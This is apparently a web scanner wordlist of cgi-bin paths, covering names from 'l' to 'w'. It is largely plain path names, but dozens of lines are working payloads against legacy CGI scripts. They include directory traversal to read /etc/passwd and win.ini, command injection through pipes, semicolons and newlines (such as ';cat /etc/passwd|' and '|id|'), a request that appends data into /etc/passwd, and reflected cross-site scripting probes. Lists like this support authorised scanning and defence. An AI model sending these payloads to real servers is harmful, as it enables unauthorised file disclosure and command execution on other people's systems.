cgi-bin/lcgi/sys:/novonyx/suitespot/docs/sewse/misc/test.jse
cgi-bin/libagent.cgi
cgi-bin/list.asp
cgi-bin/listmsgall.asp
cgi-bin/listmsgallsearch.asp
cgi-bin/listmsg.asp
cgi-bin/listmsgsort.asp
cgi-bin/listrec.pl
cgi-bin-live
cgi-bin/lmail.pl
cgi-bin/loader
cgi-bin/loadpage.cgi
cgi-bin/loadpage.cgi?user_id=1&file=../../../../../../../../../../etc
cgi-bin/loadpage.cgi?user_id=1&file=../../../../../../../../../../etc/passwd
cgi-bin/loadpage.cgi?user_id=1&file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
cgi-bin/log
cgi-bin/logbook.pl
cgi-bin/login
cgi-bin/login.asp
cgi-bin/login.aspx
cgi-bin/login.cgi
cgi-bin/login.htm
cgi-bin/login.html
cgi-bin/login.php
cgi-bin/login.pl
cgi-bin/logi.php
cgi-bin/logiredir.asp
cgi-bin/logit.cgi
cgi-bin/log/nether-log.pl?checkit
cgi-bin/logoff.asp
cgi-bin/log-reader.cgi
cgi-bin/logs
cgi-bin/logs/access_log
cgi-bin/logs.cgi/config.dat
cgi-bin/logs.cgi/firewalllogcountry.dat
cgi-bin/logs.cgi/firewalllogport.dat
cgi-bin/logs.cgi/log.dat
cgi-bin/logs.cgi/proxylog.dat
cgi-bin/logs/error_log
cgi-bin/logs.pl
cgi-bin/lookwho.cgi
cgi-bin/lpbritor.pl
cgi-bin/ls
cgi-bin/lshop.cgi
cgi-bin/lsindex2.bat|dir%20c:\[dir]
cgi-bin/luci
cgi-bin/luci/
cgi-bin/luci/;stok=d/admin/network/network/
cgi-bin/luci/;stok=d/admin/system/packages
cgi-bin/luci/;stok=<home-stok_value>/admin/ping
cgi-bin/luci/;stok=<homeuser-stok_value>/admin/config_export
cgi-bin/luci/;stok=<stok_value>/admin/ping
cgi-bin/luci/;stok=<stok_value>/admin/traceroute
cgi-bin/lwgate
cgi-bin/lwgate.cgi
cgi-bin/LWGate.cgi
cgi-bin/mac.cgi
cgi-bin/machineinfo
cgi-bin/magiccard.cgi
cgi-bin/magiccard.cgi?pa=3Dpreview&amp;next=3Dcustom&amp;page=3D../../../../../../../../../../etc/passwd
cgi-bin/magiccard.cgi?pa=3Dpreview&next=3Dcustom&page=3D../../../../../../../../../../etc
cgi-bin/mail
cgi-bin/mail.cgi
cgi-bin/mail/emumail.cgi
cgi-bin/mail/emumail.cgi?type=/../../../../../../../../../../../../../../../etc
cgi-bin/mail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/mailengine.pl
cgi-bin/mailform.exe
cgi-bin/mailing/mailing.cgi
cgi-bin/mailit.pl
cgi-bin/mailit.pl+00
cgi-bin/maillist.cgi
cgi-bin/maillist.pl
cgi-bin/mailnews.cgi
cgi-bin/mail/nph-mr.cgi
cgi-bin/mail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../etc/passwd%00
cgi-bin/mail.pl
cgi-bin/mailview.cgi?cmd=view&amp;fldrname=inbox&amp;select=1&amp;html=../../../../../../etc/passwd
cgi-bin/main-cgi
cgi-bin/main.cgi
cgi-bin/main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../../etc
cgi-bin/main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../../etc/passwd
cgi-bin/mainfunction.cgi
cgi-bin/main_menu.pl
cgi-bin/main.plex
cgi-bin/mainv2
cgi-bin/majordomo.pl
cgi-bin/makechanges/easysteps/easysteps.pl
cgi-bin/man2html
cgi-bin/manage/cgi/cgiproc
cgi-bin/man-cgi
cgi-bin/MANGA/admin.cgi
cgi-bin/MANGA/admin.cgi.
cgi-bin/man.sh
cgi-bin/masterCGI
cgi-bin/mastergate/search.cgi?search=0&search_on=all
cgi-bin/math_sum.mscgi
cgi-bin/mathtex/mathtex.pl
cgi-bin/mathtex.pl
cgi-bin/mb.cgi
cgi-bin/megabook/admin.cgi?login=<script>alert('Vulnerable')</script>
cgi-bin/members.pl
cgi-bin/meta.pl
cgi-bin/mgrqcgi
cgi-bin/mini_logger.cgi
cgi-bin/minimal.exe
cgi-bin/ministats/admin.cgi
cgi-bin/mj_wwwusr
cgi-bin/mkilog.exe
cgi-bin/mkplog.exe
cgi-bin/mmstdod.cgi
cgi-bin/modem.cgi
cgi-bin/mods/apage/apage.cgi?f=file.htm.|id|
cgi-bin/mods/calendar/index.cgi
cgi-bin/module/sharedobjmanager/firewall/SOMServiceObjDialog
cgi-bin/module/sharedobjmanager/policy_new/874/PolicyTable
cgi-bin/moin.cgi?test
cgi-bin/mojo/mojo.cgi
cgi-bin/mortgage.pl+00
cgi-bin/mrtg.cgi
cgi-bin/mrtg.cgi?cfg=blah
cgi-bin/mrtg.cgi?cfg=../../../../../../../../etc/passwd
cgi-bin/msgsrc.asp
cgi-bin/msmmask.exe
cgi-bin/ms_proxy_auth_query
cgi-bin/mt
cgi-bin/mt7/mt.cgi
cgi-bin/mt7/mt-xmlrpc.cgi
cgi-bin/mt.cgi
cgi-bin/mt/mt.cfg
cgi-bin/mt/mt.cgi
cgi-bin/mt/mt-check.cgi
cgi-bin/mt/mt-load.cgi
cgi-bin/mt/mt-xmlrpc.cgi
cgi-bin/mt-static
cgi-bin/mt-static/mt.cfg
cgi-bin/mt-static/mt-check.cgi
cgi-bin/mt-static/mt-load.cgi
cgi-bin/mt-xmlrpc.cgi
cgi-bin/multihtml.pl
cgi-binmultihtml.pl
cgi-bin/munin-cgi-graph/
cgi-bin/musicqueue.cgi
cgi-bin/myguestbook.cgi?action=view
cgi-bin/myquiz.pl/ask/
cgi-bin/nagios3/status.cgi
cgi-bin/nagios4/status.cgi
cgi-bin/namazu.cgi
cgi-bin/nbmember.cgi
cgi-bin/nbmember.cgi?cmd=list_all_users
cgi-bin/ncommerce3/execmacro/macro.d2w/noexistinghtmlblock
cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report
cgi-bin/neomail.pl
cgi-bin/neomail-prefs.pl
cgi-bin/netauth.cgi
cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../../etc
cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../../etc/passwd
cgi-bin/netclubs/login.cgi
cgi-bin/netclubs/vchat/scripts/imessage.cgi
cgi-bin/netclubs/vchat/scripts/sendim.cgi
cgi-bin/netpad.cgi
cgi-bin/New_GUI/Set/Admin.asp
cgi-bin/newmsg.asp
cgi-bin/newsdesk.cgi
cgi-bin/newsdesk.cgi?t=../../../../../../../../../../etc
cgi-bin/newsdesk.cgi?t=../../../../../../../../../../etc/passwd
cgi-bin/newsdesk.cgi?t=../pass.txt
cgi-bin/newsletter.php.cgi
cgi-bin/news/news.cgi
cgi-bin/news/NsVisitor.cgi
cgi-bin/newsscript.pl
cgi-bin/nimages.php
cgi-bin/nlog-smb.cgi
cgi-bin/nlog-smb.pl
cgi-bin/nobody
cgi-bin/nobody/nobody/loginquick.htm/cgi-bin/rdfs.cgi
cgi-bin/nobody/search.cgi
cgi-bin/nobody/Search.cgi
cgi-bin/nobody/VerifyCode.cgi
cgi-bin/nobuffer.pl+00
cgi-bin/non-existent.pl
cgi-bin/noshell
cgi-bin/nph-emumail.cgi
cgi-bin/nph-emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/nph-emumail.cgi?type=/../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/nph-error.pl
cgi-bin/nph-exploitscanget.cgi
cgi-bin/nph-maillist.pl
cgi-bin/nph-publish
cgi-bin/nph-publish.cgi
cgi-bin/nph-showlogs.pl
cgi-bin/nph-test-cgi
cgi-bin/.nsconfig
cgi-bin/nslookup.cgi
cgi-bin/ntitar.pl
cgi-bin/officescan/cgi/cgiChkMasterPwd.exe
cgi-bin/officescan/cgi/jdkRqNotify.exe
cgi-bin/oj.cgi
cgi-bin-old
cgi-bin.old
cgi-bin/onvif.cgi
cgi-bin/opendir.php?/etc/passwd
cgi-bin/operator/fileread
cgi-bin/operator/servetest?cmd=ntp&ServerName=pool.ntp.org&TimeZone=03:00|id||'
cgi-bin/order
cgi-bin/order.eu
cgi-bin/orders/orders.txt
cgi-bin/ote/select.cgi
cgi-bin/ote/selectconf.cgi
cgi-bin/outgoing.cgi
cgi-bin/ovpnmain.cgi
cgi-bin/ozkerz
cgi-bin/page.cgi?../../../../../../../../../../etc/passwd
cgi-bin/pagelog.cgi
cgi-bin/pals-cgi
cgi-bin/pals-cgi?palsaction=restart&documentname=/etc/passwd
cgi-bin/pals-cgi?palsAction=restart&documentName=/etc/passwd
cgi-bin/parse-file
cgi-bin/parse_xml.cgi
cgi-bin/pass
cgi-bin/pass&quot
cgi-bin/.passwd
cgi-bin/passwd
cgi-bin/passwd.cgi
cgi-bin/passwd.txt
cgi-bin/password
cgi-bin/password.cgi
cgi-bin/password.txt
cgi-bin/path_to_file/bsml.pl
cgi-bin/payload.luci
cgi-bin/pbcgi.cgi?name=Joe%Camel&email=%3C
cgi-bin/pbcgi.cgi?name=Joe%Camel&email=%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3B%3C%2FSCRIPT%3E
cgi-bin/pbcgi.exe
cgi-bin/Pbcgi.exe
cgi-bin/pcm.cgi
cgi-bin/perl
cgi-bin/perlcal/cal_make.pl
cgi-bin/perl.exe
cgi-bin/perl.exe?-v
cgi-bin/perl/samples/lancgi.pl
cgi-bin/perl/samples/volscgi.pl
cgi-bin/perlshop.cgi
cgi-bin/perl?-v
cgi-bin/personallogin.asp
cgi-bin/PersonalLogin.asp
cgi-bin/pfdispaly.cgi
cgi-bin/pfdispaly.cgi?'%0A/bin/cat%20/etc/passwd|'
cgi-bin/pfdispaly.cgi?../../../../../../../../../../etc
cgi-bin/pfdispaly.cgi?../../../../../../../../../../etc/passwd
cgi-bin/pfdisplay.cgi
cgi-bin/pfdisplay.cgi?'%0A/bin/cat%20/etc/passwd|'
cgi-bin/phf
cgi-bin/phf.cgi?QALIA
cgi-bin/phf.cgi?QALIAS=x%0a/bin/cat%20/etc/passwd
cgi-bin/photo
cgi-bin/photo_cfg.pl
cgi-bin/photodata/manage.cgi
cgi-bin/photo/manage.cgi
cgi-bin/photo/protected/manage.cgi
cgi-bin/php
cgi-bin/php4
cgi-bin/php5
cgi-bin/php-cgi
cgi-bin/php.cgi
cgi-bin/php.cgi?/etc/passwd
cgi-bin/phpinfo.php
cgi-bin/php.ini
cgi-bin/php/lang_change.php
cgi-bin/pingping.cgi
cgi-bin/plusmail
cgi-bin/plusmail\
cgi-bin/pl_web.cgi/util_configlogin_act
cgi-bin/pnp/select.cgi
cgi-bin/pnp/select_.cgi
cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=\etc\passwd%00
cgi-bin/pollssi.cgi
cgi-bin/portfw.cgi
cgi-bin/post16.exe
cgi-bin/post2.asp
cgi-bin/post32.exe|echo%20>c:\text.txt
cgi-bin/post.asp
cgi-bin/postcard.pl
cgi-bin/postcards.cgi
cgi-bin/post-query
cgi-bin/post_query
cgi-bin/powerup/r.cgi
cgi-bin/powerup/r.cgi?FILE=../../../../../../../../../../etc/passwd
cgi-bin/powerup/r.cgi?FILE=../../../../../../../../../../passwd
cgi-bin/ppdscgi.exe
cgi-bin/</pre></body></html>
cgi-bin/preferences.cgi
cgi-bin/preview_email.cgi
cgi-bin/printenv
cgi-bin/printenv.pl
cgi-bin/printenv.tmp
cgi-bin/privacy_policy.asp
cgi-bin/probe.cgi
cgi-bin/probecontrol.cgi?command=enable&username=cancer&password=killer
cgi-bin/probleminsert.asp
cgi-bin/processit.pl
cgi-bin/profile.cgi
cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser&hst_id=none&snmpv3_profile_id=&ip_address=
cgi-bin/protected/manage_files.cgi
cgi-bin/protected/manage_hosts_short.cgi?action=search_proceed&search_pattern=
cgi-bin/proxy.cgi
cgi-bin/psunami.cgi
cgi-bin/ptzctrldown.cgi
cgi-bin/ptzctrlleft.cgi
cgi-bin/ptzctrlright.cgi
cgi-bin/ptzctrlup.cgi
cgi-bin/ptzctrlzoomin.cgi
cgi-bin/ptzctrlzoomout.cgi
cgi-bin/pu3.pl
cgi-bin/pub/english.cgi?op=rmail
cgi-bin/public/edconfd.cgi
cgi-bin/publisher/search.cgi
cgi-bin/publisher/search.cgi?dir=jobs&template=;cat%20/etc/passwd|&output_number=10
cgi-bin/purchase/order_form.cgi
cgi-bin/purchase/purchase.cgi
cgi-bin/qcmap_auth
cgi-bin/qcmap_web_cgi
cgi-bin/query
cgi-bin/quickstore.cgi
cgi-bin/quickstore.cgi?page=../../../../../../../../../../etc
cgi-bin/quickstore.cgi?page=../../../../../../../../../../etc/passwd%00html&cart_id=
cgi-bin/quikmail/nph-emumail.cgi?type=../%00
cgi-bin/quikstore.cfg
cgi-bin/quikstore.cgi
cgi-bin/quizme.cgi
cgi-bin/ratlog.cgi
cgi-bin/rayvon13.pl
cgi-bin/rb.cgi
cgi-bin/r.cgi
cgi-bin/r.cgi?FILE=../../../../../../../../../../etc
cgi-bin/r.cgi?FILE=../../../../../../../../../../etc/passwd
cgi-bin/read.asp
cgi-bin/read.cgi
cgi-bin/readfile.cgi
cgi-bin/readfile.cgi?query=adminid
cgi-bin/readmsg.asp
cgi-bin/reboot.cgi
cgi-bin/redir..asp
cgi-bin/redir.asp
cgi-bin/redirect
cgi-bin/redirect.cgi
cgi-bin/redirnews.asp
cgi-bin/redir.php
cgi-bin/register.cgi
cgi-bin/register.pl+00
cgi-bin/regstep0.asp
cgi-bin/regstep1.asp
cgi-bin/regstep2.asp
cgi-bin/regstep3adv.asp
cgi-bin/regstep3.asp
cgi-bin/regstep4.asp
cgi-bin/regstep5.asp
cgi-bin/regstep6.asp
cgi-bin/replicator/webpage.cgi
cgi-bin/replicator/webpage.cgi/
cgi-bin/replyall.asp
cgi-bin/reply.asp
cgi-bin/reportproblem.asp
cgi-bin/reportproblemform.asp
cgi-bin/responder.cgi
cgi-bin/retrieve_password.pl
cgi-bin/reviews/newpro.cgi
cgi-bin/rguest.exe
cgi-bin/rightfax/fuwww.dll/?
cgi-bin/rksh
cgi-bin/rmp_query
cgi-bin/robadmin.cgi
cgi-bin/robpoll.cgi
cgi-bin/routers2.pl
cgi-bin/routing.cgi
cgi-bin/rpm_query
cgi-bin/rsh
cgi-bin/rtm.log
cgi-bin/runDiagnostics.cgi
cgi-bin/rwcgi60
cgi-bin/rwcgi60/showenv
cgi-bin/rwwwshell.pl
cgi-bin/rxgoogle.cgi
cgi-binS
cgi-bin/samba/smb2www.pl
cgi-bin/samba/smbshr.pl
cgi-bin/sawmill5
cgi-bin/sbcgi/sitebuilder.cgi
cgi-bin/scoadminreg.cgi
cgi-bin/script.cgi
cgi-bin/<script>cross_site_scripting.nasl</script>.pl
cgi-bin/scripts/cart.pl
cgi-bin/scripts/fpadmcgi.exe
cgi-bin/scripts/slxweb.dll/getfile?type=library&file=[invalid
cgi-bin/scripts/../../this_server/ServerManager.srv
cgi-bin/script.xyz
cgi-bin-sdb
cgi-bin-sdb/14all-1.1.cgi
cgi-bin-sdb/14all.cgi
cgi-bin-sdb/a1disp3.cgi
cgi-bin-sdb/a1stats/a1disp3.cgi
cgi-bin-sdb/a1stats/a1disp4.cgi
cgi-bin-sdb/admin.cgi
cgi-bin-sdb/anacondaclip.pl
cgi-bin-sdb/apexec.pl
cgi-bin-sdb/auktion.cgi
cgi-bin-sdb/cal_make.pl
cgi-bin-sdb/cgiforum.pl
cgi-bin-sdb/commerce.cgi
cgi-bin-sdb/dcforum.cgi
cgi-bin-sdb/directorypro.cgi
cgi-bin-sdb/dose.pl
cgi-bin-sdb/emu/html/emumail.cgi
cgi-bin-sdb/emumail.cgi
cgi-bin-sdb/emumail/emumail.cgi
cgi-bin-sdb/ezshopper/search.cgi
cgi-bin-sdb/fileseek2.cgi
cgi-bin-sdb/FileSeek2.cgi
cgi-bin-sdb/fileseek.cgi
cgi-bin-sdb/FileSeek.cgi
cgi-bin-sdb/generate.cgi
cgi-bin-sdb/gh.cgi
cgi-bin-sdb/gH.cgi
cgi-bin-sdb/hsx.cgi
cgi-bin-sdb/imagefolio/admin/admin.cgi
cgi-bin-sdb/ImageFolio/admin/admin.cgi
cgi-bin-sdb/loadpage.cgi
cgi-bin-sdb/magiccard.cgi
cgi-bin-sdb/mail/emumail.cgi
cgi-bin-sdb/mail/nph-mr.cgi
cgi-bin-sdb/main.cgi
cgi-bin-sdb/mrtg.cgi
cgi-bin-sdb/netauth.cgi
cgi-bin-sdb/newsdesk.cgi
cgi-bin-sdb/nph-emumail.cgi
cgi-bin-sdb/nph-showlogs.pl
cgi-bin-sdb/pagelog.cgi
cgi-bin-sdb/pfdispaly.cgi
cgi-bin-sdb/powerup/r.cgi
cgi-bin-sdb/printenv
cgi-bin-sdb/quickstore.cgi
cgi-bin-sdb/r.cgi
cgi-bin-sdb/sbcgi/sitebuilder.cgi
cgi-bin-sdb/search.pl
cgi-bin-sdb/search/search.cgi
cgi-bin-sdb/sendtemp.pl
cgi-bin-sdb/shop.cgi
cgi-bin-sdb/shopper.cgi
cgi-bin-sdb/sojourn.cgi
cgi-bin-sdb/store.cgi
cgi-bin-sdb/store/index.cgi
cgi-bin-sdb/story.pl
cgi-bin-sdb/story/story.pl
cgi-bin-sdb/talkback.cgi
cgi-bin-sdb/technote/main.cgi
cgi-bin-sdb/traffic.cgi
cgi-bin-sdb/ttawebtop.cgi
cgi-bin-sdb/ttawebtop.cgi/
cgi-bin-sdb/ustorekeeper.pl
cgi-bin-sdb/webmail/html/emumail.cgi
cgi-bin-sdb/webspirs.cgi
cgi-bin-sdb/yabb.pl
cgi-bin-sdb/YaBB.pl
cgi-bin-sdb/zml.cgi
cgi-bin/search
cgi-bin/search.cgi
cgi-bin/search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini
cgi-bin/search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
cgi-bin/search.pl
cgi-bin/search.pl+00
cgi-bin/search/search.cgi
cgi-bin/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc
cgi-bin/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../etc
cgi-bin/search/show.pl
cgi-bin/sendform.cgi
cgi-bin/sendtemp.pl
cgi-bin/sensepost.exe?/c+dir
cgi-bin/ser.cgi
cgi-bin/ServeBanner.asp
cgi-bin/servers/link.cgi
cgi-bin/ServerView/
cgi-bin/session/adminlogin
cgi-bin/setadslattr.cgi
cgi-bin/setddnsattr.cgi
cgi-bin/sethomepage.asp
cgi-bin/setinetattr.cgi
cgi-bin/setpasswd.cgi
cgi-bin/SetRS422Settings
cgi-bin/settings.asp
cgi-bin/SettingsDeleteEmail.asp
cgi-bin/settingslinks.asp
cgi-bin/settingsnewemail3adv.asp
cgi-bin/settingsnewemail3.asp
cgi-bin/settingsnewemail4.asp
cgi-bin/settingsnewemail5.asp
cgi-bin/settingsnewsgroups.asp
cgi-bin/SettingsPageProperties.asp
cgi-bin/SettingsResetDelete.asp
cgi-bin/SettingsUpdate.asp
cgi-bin/settingsupdateemail3adv.asp
cgi-bin/settingsupdateemail4.asp
cgi-bin/settingsupdateemail5.asp
cgi-bin/Settingsupdatepp.asp
cgi-bin/setup.cgi
cgi-bin/setup.pl
cgi-bin/setwifiattr.cgi
cgi-bin/sgb_dir/superguestconfig
cgi-bin/SGB_DIR/superguestconfig
cgi-bin/sh
cgi-bin/shadow.txt
cgi-bin/shop/auth_data/auth_user_file.txt
cgi-bin/shop.cgi
cgi-bin/shop.cgi?page=../../../../../../../etc/passwd
cgi-bin/shop.cgi/page=../../../filename.ext
cgi-bin/shop/member_html.cgi?file=;cat%20/etc/passwd|
cgi-bin/shop/member_html.cgi?file=|cat%20/etc/passwd|
cgi-bin/shop/normal_html.cgi?file=;cat%20/etc/passwd|
cgi-bin/shop/normal_html.cgi?file=|cat%20/etc/passwd|
cgi-bin/shop/normal_html.cgi?file=../../../../../../etc/issue%00
cgi-bin/shop/normal_html.cgi?file=&lt;script&gt;alert(\"Vulnerable\")&lt;/script&gt;
cgi-bin/shop/orders/orders.txt
cgi-bin/shopper.cgi
cgi-bin/shopper.cgi?newpage=../../../../../../../../../../etc
cgi-bin/shopper.cgi?newpage=../../../../../../../../../../etc/passwd
cgi-bin/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd|
cgi-bin/shop.plx
cgi-bin/shop.plx/page=nessus1004003223
cgi-bin/shop.plx/page=nessus1166437460
cgi-bin/shop.plx/page=nessus1232376815
cgi-bin/shop.plx/page=nessus1253224446
cgi-bin/shop.plx/page=nessus1271002899
cgi-bin/shop.plx/page=nessus1764909175
cgi-bin/shop.plx/page=nessus1900840733
cgi-bin/shop.plx/page=nessus2051977388
cgi-bin/shop.plx/page=nessus2075229429
cgi-bin/shop.plx/page=nessus2084700081
cgi-bin/shop.plx/page=nessus297269350
cgi-bin/shop.plx/page=nessus349377691
cgi-bin/shop.plx/page=nessus485782205
cgi-bin/shop.plx/page=nessus516829564
cgi-bin/shop.plx/page=nessus551165306
cgi-bin/shop.plx/page=nessus564897398
cgi-bin/shop.plx/page=nessus940345784
cgi-bin/shop.plx/SID
cgi-bin/showcheckins.cgi?person=<script>alert('Vulnerable')</script>
cgi-bin/showcheckins.cgi?person=<script>alert('XSS')</script>
cgi-bin/showimage.asp
cgi-bin/show.pl
cgi-bin/showuser.cgi
cgi-bin/shtml.dll
cgi-bin/shutdown.cgi
cgi-bin/simplestguest.cgi
cgi-bin/simplestmail.cgi
cgi-bin/SiteScope/cgi/go.exe/SiteScope?page=eventLog&machine=&logName=System&account=administrator
cgi-bin/site_searcher.cgi
cgi-bin/skd4svx9.pl
cgi-bin/smallmenu.pl
cgi-bin/smap
cgi-bin/smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd|
cgi-bin/smartsearch/smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd|
cgi-bin/smb2www.pl
cgi-bin/smbshr.pl
cgi-bin/smoothinfo.cgi
cgi-bin/snorkerz.bat
cgi-bin/snorkerz.cmd
cgi-bin/snpfiltered.pl
cgi-bin/sojourn.cgi
cgi-bin/sojourn.cgi?cat=../../../../../../../../../../etc
cgi-bin/sojourn.cgi?cat=../../../../../../../../../../etc/password%00
cgi-bin/spboard/board.cgi
cgi-bin/spin_client.cgi?aaaaaaaa
cgi-bin/sqwebmail?noframes=1
cgi-bin/ss
cgi-bin/sscd_suncourier.pl
cgi-bin/ssi/.htpasswd
cgi-bin_ssl
cgi-bin/stadminact.exe
cgi-bin/start.cgi
cgi-bin/start.cgi/%3Cscript%3Ealert('Vulnerable');%3C/script%3E
cgi-bin/start.cgi/%3Cscript%3Ealert('XSS');%3C/script%3E
cgi-bin/stat
cgi-bin/stat.pl
cgi-bin/stats
cgi-bin/stats-bin-p/reports/index.html
cgi-bin/statsconfig
cgi-bin/stats_old
cgi-bin/stats.pl
cgi-bin/stats.prf
cgi-bin/statusconfig.pl
cgi-bin/statview.pl
cgi-bin/store/agora.cgi
cgi-bin/store/agora.cgi?cart_id=<script>alert('Vulnerable')</script>
cgi-bin/store/agora.cgi?cart_id=<script>alert('XSS')</script>
cgi-bin/store/agora.cgi?page=whatever33.html
cgi-bin/store.cgi
cgi-bin/store.cgi?
cgi-bin/store.cgi?StartID=../../../../../../../../../../etc/passwd%00.html
cgi-bin/store/index.cgi
cgi-bin/store/index.cgi?page=../../../../../../../../etc/passwd
cgi-bin/store/__SQLUSER__
cgi-bin/story.pl
cgi-bin/story/story.pl
cgi-bin/subprodemo/subscribe.pl
cgi-bin/subscribe.pl
cgi-bin/suche/hsx.cgi
cgi-bin/supervisor/adcommand.cgi
cgi-bin/supervisor/cloudsetup.cgi
cgi-bin/supervisor/CloudSetup.cgi
cgi-bin/supervisor/PwdGrp.cgi
cgi-bin/survey
cgi-bin/survey.cgi
cgi-bin/sws/admin.html
cgi-bin/sws/manager.pl
cgi-bin/system.cgi
cgi-bin/system_cmd.cgi
cgi-bin/system.conf
cgi-bin/system/userlogin.asp
cgi-bin/system/userlogin.aspx
cgi-bin/tablebuild.pl
cgi-bin/talkback.cgi
cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1
cgi-bin/tcsh
cgi-bin/technote/main.cgi
cgi-bin/technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../../etc/passwd
cgi-bin/technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../etc/passwd
cgi-bin/technote/print.cgi
cgi-bin/terms.asp
cgi-bin/test-cgi
cgi-bin/test-cgi?*
cgi-bin/test-cgi?/*
cgi-bin/test.cgi
cgi-bin/test-cgi.bat
cgi-bin/testcgi.exe
cgi-bin/test-cgi.exe?<script>alert(document.cookie)</script>
cgi-bin/testcgi.exe?<script>alert(document.cookie)</script>
cgi-bin/test-cgi.tcl
cgi-bin/test-env
cgi-bin/test_env.pl
cgi-bin/testing_whatever
cgi-bin/test/test.cgi
cgi-bin/testwifi.cgi
cgi-bin/texis.exe/junk
cgi-bin/texis/junk
cgi-bin/texis/phine
cgi-bin/textcounter.pl
cgi-bin/textenv.pl
cgi-bin/tidfinder.cgi
cgi-bin/tigvote.cgi
cgi-bin/time.cgi
cgi-bin/timedaccess.cgi
cgi-bin/title.cgi
cgi-bin/tpgnrock
cgi-bin/traffic.cgi
cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/passwd
cgi-bin/trap.cgi
cgi-bin/troops.cgi
cgi-bin/tseekdir.cgi
cgi-bin/tszjyzca.pl
cgi-bin/ttawebtop.cgi
cgi-bin/ttawebtop.cgi/
cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../etc/passwd
cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../passwd
cgi-bin/ttt-in
cgi-bin/ttt-out
cgi-bin/ttx.cg
cgi-bin/ttx.cgi
cgi-bin/twiki/search/Main
cgi-bin/ultraboard.cgi
cgi-bin/ultraboard.pl
cgi-bin/UltraBoard.pl
cgi-bin/unlg1.1
cgi-bin/unlg1.2
cgi-bin/update.dpgs
cgi-bin/updatexlrator.cgi
cgi-bin/upload.cgi
cgi-bin/upload.cgi+
cgi-bin/uploadfile
cgi-bin/uploadimage.asp
cgi-bin/upload.pl
cgi-bin/upload.pl+00
cgi-bin/Upload.pl+00
cgi-bin/upload/web-ftp.cgi
cgi-bin/upnp_start.cgi
cgi-bin/upnp_stop.cgi
cgi-bin/uptime
cgi-bin/urlcount.cgi?%3CIMG%20
cgi-bin/urlcount.cgi?%3CIMG%20SRC%3D%22%22%20ONERROR%3D%22alert%28%27Vulnerable%27%29%22%3E
cgi-bin/urlfilter.cgi
cgi-bin/user/Config.cgi
cgi-bin/userConfig.cgi
cgi-bin/userreg.cgi?cmd=insert&amp;lang=eng&amp;tnum=3&amp;fld1=test999%0acat&lt;/var/spool/mail/login&gt;&gt;/etc/passwd
cgi-bin/users/scripts/submit.cgi
cgi-bin/ustorekeeper.pl
cgi-bin/utm/admin
cgi-bin/utm/utm_stat
cgi-bin/uz6s29e9.pl
cgi-bin/vadecx78.pl
cgi-bin/version/version.cgi
cgi-bin/view/Codev/DownloadTWiki
cgi-bin/viewcvs.cgi/viewcvs/
cgi-bin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>
cgi-bin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('XSS')</script>
cgi-bin/viewcvs.cgi/viewcvs/viewcvs/
cgi-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\
cgi-bin/view/image
cgi-bin/viewlog.asp
cgi-bin/ViewLog.asp
cgi-bin/viewlogs.pl
cgi-bin/view/sandbox/bombsite
cgi-bin/view/Sandbox/BombSite
cgi-bin/view-source
cgi-bin/viewsource?/etc/passwd
cgi-bin/view-source?view-source
cgi-bin/viewsrc.cgi
cgi-bin/view/TWiki/TWikiInstallationGuide
cgi-bin/viralator.cgi
cgi-bin/virgil.cgi
cgi-bin/visadmin.exe
cgi-bin/visitor.exe
cgi-bin/v_login.asp
cgi-bin/vmail.cgi
cgi-bin/vote.cgi
cgi-bin/vpasswd.cgi
cgi-bin/vpnconn.cgi
cgi-bin/vpnmain.cgi
cgi-bin/vssetcookie.exe?
cgi-bin//_vti_bin/fpcount.exe?page=default.htm|image=3|digits=15
cgi-bin//_vti_pvt/doctodep.btr
cgi-bin/vtls/vtls.web.gateway
cgi-bin/vulnerable.cgi
cgi-bin/w3-msql
cgi-bin/w3-msql/
cgi-bin/w3-msql/protected-directory/.htpasswd
cgi-bin/w3-msql/protected-directory/private-file
cgi-bin/w3-sql
cgi-bin/wais.pl
cgi-bin/wakeonlan.cgi
cgi-bin/warning.asp
cgi-bin/way-board.cgi?db=/etc/passwd%00
cgi-bin/way-board/way-board.cgi?db=/etc/passwd%00
cgi-bin/wconsole.dll
cgi-bin/webais
cgi-bin/webbbs.cgi
cgi-bin/webbbs.exe
cgi-bin/webbbs/webbbs_config.pl
cgi-bin/webboard/generate.cgi/
cgi-bin/webcart/webcart.cgi
cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YE
cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20/etc/passwd|&CODE=PHOLD
cgi-bin/web.cgi
cgi-bin/webcm
cgi-bin/webctrl.cgi
cgi-bin/webctrl.cgi?action=pingtest_update&ping_addr=127.0.0.1
cgi-bin/webdist.cgi
cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd
cgi-bin/webdriver
cgi-bin/webevent/webevent.cgi
